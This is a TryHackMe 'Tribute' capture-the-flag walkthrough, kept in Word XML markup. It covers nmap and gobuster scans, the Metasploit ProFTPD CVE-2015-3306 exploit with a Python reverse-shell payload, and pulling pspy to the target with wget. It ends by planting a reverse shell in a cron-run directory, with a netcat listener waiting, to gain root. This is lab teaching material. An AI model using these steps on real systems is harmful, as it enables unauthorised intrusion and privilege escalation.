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Fredericka the Great" w:cs="Fredericka the Great" w:eastAsia="Fredericka the Great" w:hAnsi="Fredericka the Great"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Fredericka the Great" w:cs="Fredericka the Great" w:eastAsia="Fredericka the Great" w:hAnsi="Fredericka the Great"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Fredericka the Great" w:cs="Fredericka the Great" w:eastAsia="Fredericka the Great" w:hAnsi="Fredericka the Great"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5567363" cy="1104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Fredericka the Great" w:cs="Fredericka the Great" w:eastAsia="Fredericka the Great" w:hAnsi="Fredericka the Great"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="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is a writeup/walkthrough for the TryHackMe room "Tribute" by Joshua17sc.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Here I will include screenshots, explanations, commands and tools I used to complete the room.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completed this room using Parrot OS, so please note there might be a syntax difference in the commands. I hope this writeup is useful to anyone wanting a great challenge with Tribute, and thank you for using my write up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       CryptoTzipi aka CyberLola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27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DEPLOY THE MACHINE!!!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first thing we need to do is run a nmap to looks for open ports, vulnerabilities, operating systems and versions.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 like to use the command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nmap -sV -sC --script=vuln &lt;insert here the target's IP&gt;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You could also insert the flag -O to find operating systems, but it requires you to run nmap as sudo.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For a comprehensive guide on nmap usage, refer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Nmap Network Scanning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Nice! SSH is open on port 22, which means we can SSH into the machine once we get our hands into some credentials!!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ProFTPD 1.3.5 seems to be the service we will exploit, so let’s search for the vulnerability at</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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https://www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see what we can use to exploit this machine!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Going through the finished scan and exploit db, we can find all the answers for the first 5 questions of task#1.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Next we should run a directory scan to see if we find something interesting.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My tool choice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gobuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (comes preinstalled in Kali and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Parrot OS. If you are using any other distro and don't have gobuster installed, refer to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https://github.com/OJ/gobuster</w:t>
        </w:r>
      </w:hyperlink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The command should look like this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gobuster dir -u http://&lt;target machine's IP&gt; -w /usr/share/wordlists/dirb/common.txt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dir = directory/file enumeration mode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-u = URL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-w = wordlist path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Looking at our finished scan we discovered another link http://&lt;IP&gt;/src/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Looking at it in your browser, you will see an interesting folder in there. Let's open it! The first file will take us to the image used for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the home page, so nothing there, but looking on the second file ....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543550" cy="2743200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Here we have our answer for the last question of the task!!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We found very valuable information during our nmap scan, so it's time to use what we gathered to exploit this machine.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My chosen way to exploit it is through Metasploit Framework, since I really like Metasploit (sorry, Offensive Security)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So let's start it by typing the command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msfconsole</w:t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Gotta love Metasploit banners!!!!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Next, we search for our found vulnerability using the command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search CVE-2015-3306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There is only one result, so we will use that! The command is very simple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 0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You will notice that the module was added to the prompt in red characters.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We still need to get some things ready before we can run our exploit, so we type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options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Here we need to set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (remote host, which is our target machine's IP).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Then we need to set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SITEPATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to /var/www/html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We still haven't set a payload for our exploit, so we will do that next!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show payloads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It will give you a list of possible payloads. I like the python reverse shells so I will go with that one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 payload /cmd/unix/reverse_python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Here we also need to set some things before running the exploit, so we "show options" again and scroll down until we see options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for the payload. We set the LHOST ( local host, which is us here, our computer or TryHackMe attack box if you are using it.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Remember that the IP you want, if you are using your own computer, is the one displayed on top of the TryhackMe page inside a green box! If you are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using the attack box, then the IP is shown in the prompt root@IP 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You can leave the port as 4444 which is the default (not a good idea for a real life engagement since port 4444 is the default in so many exploitation tools)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All seem all good, we can run our exploit either by typing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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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And we got a shell!!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To stabilize this shell, type in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python3 -c 'import pty;pty.spawn("/bin/bash")'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Time to explore around!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As the room says, ls is our ally here .... I go further because I am curious, so I always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ls -la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And in the home directory we found ourselves 2 users!!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Next step is to see if we can somehow find some credentials to ssh as one of these users on our quest for privilege escalation.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We know their names, now we need some passwords!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Let's start by going through Angel's stuff...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Diary? People always write personal stuff in diaries...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diary</w:t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OK ... this is a riddle and you can get a password from there.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Booth? drtemperancebrenner?  What is that??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They are hinting username and password using these two words.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 did try to SSH as Angel using drtemperancebrenner as password, so I will save you the trouble.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It does NOT work ... ugh ... so they didn't change the password after all.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Time for some OSINT. What can Booth and drtemperancebrenner possibly be?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Google will tell you!!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Apparently I know NOTHING about American old TV shows from the 90s ...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And this riddle drove me NUTS for a couple of days.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So I will give you some nice hints here.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Booth and drtemperancebrenner are people, they are fictional characters from an American TV show.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Following this path ... read Angel's diary again... and again..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Pay attention! Angel is also a fictional character from an American TV show??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Find out!! :))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Alrighty, so we have Angel's password so let's SSH as Angel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417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Now we can even easily get the user2.flag!!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Moving on, let's see what other files we can take a peek at!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"She's so stupid"? Who? Let's see!!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The first time I did this, I was rushing so much trying to get the other flag, I forgot to put quotations to cat this file.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My CLI didn't like it so much, so make sure you type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"she's so stupid"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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673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Oooohhhh Did we just get our hands on some hashes?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Let's see... You can use john (the Ripper) to crack those hashes..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 am lazy, I just used an online tool, and..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0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3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Here we go! Another password!!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SSH into meaghyn, and we can get our user.flag!!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Reading the task, we can get an idea of what we need to gain root on this machine.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It mentions cronjobs! What are cronjobs?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A cron job is a Linux command used for scheduling tasks to be executed sometime in the future. A script has to run at a set time for the task to be performed.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How do we find these cronjobs? What can we do with them or to them so we can gain root??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First of all we do need to locate them. For that I use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy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pspy is a command-line tool designed to snoop on processes without the need for root permissions.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It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs.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Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea!!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The tool gathers it’s info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.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To download the tool/binary you will need to run it, refer to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https://github.com/CyberLola/pspy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Read through it to learn how to use it. Pretty clear, even a n00b like me could figure it out the first time I used it for breaking into a machine a while back.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Next we need to upload this tool into meaghyn's system! The easiest, fastest way in my opinion is through wget.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On you computer/attack box set a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sudo python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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092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From the directory you saved the tool ( you need to cd into the pspy directory)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On meaghyn's side, you need the following command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wget http://YOUR IP:80/pspy64 pspy64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(pspy64 is the binary we downloaded from github)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You will see the tool being downloaded into meaghyn's machine.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Next, you need to make it executable, so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chmod +x pspy64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And it is ready to be used!! To run it, just type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./pspy64</w:t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7051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Be patient. You will see A LOT of output appearing in front of you!!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Let the tool do its thing and just watch.. and the magic happens :)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Now we know that there is a cronjob running every minute, and the script is inside the directory .noises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What we are going to do is put a reverse shell in there, so the next time the cronjob runs, we can listen from our computer, and get a shell.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The script is super simple! I am pretty horrible with Python, so I had to review the PEH course by the Cyber Mentor to go through the little of python that I know, and I managed to write a reverse shell that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WORKS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( I was super happy about that)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You are very welcome to fork it or  copy it from here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Cyber Lola's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cd into .noises and through nano you can make a new file containing the reverse shell. I named my file "sounds.py"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Make sure to change the IP inside for your IP. You can leave the port as 7777 or choose another one of your liking.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BEFORE saving... set up a netcat listener in your computer! If you like my choice of port 7777 then the listener will be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nc -lvnp 7777</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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save your reverse shell... wait patiently for another minute so the cronjob will excecute …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BOOM, you have your shell, and after typing whoami you can see you have gained root!!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cat root.flag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DONE!!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If you followed up to here and finished the room,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CONGRATULATIONS!! WELL DONE!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 hope I was clear on all explanations and steps to complete the room.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If you have any questions or if I can help in any way, please contact me on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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or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Twitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I will be very happy to help!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Thank you very much for using my writeup!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CryptoTzipi (on TryHackMe)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CyberLola (everywhere else)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Fredericka the Great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5.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/KurenoLola" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linkedin.com/in/kureno/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27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8.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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hyperlink" Target="https://nmap.org/book/toc.html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4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CyberLola/pspy" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CyberLola/TRIBUTE/blob/main/reverse_shell_to_root" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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rederickatheGreat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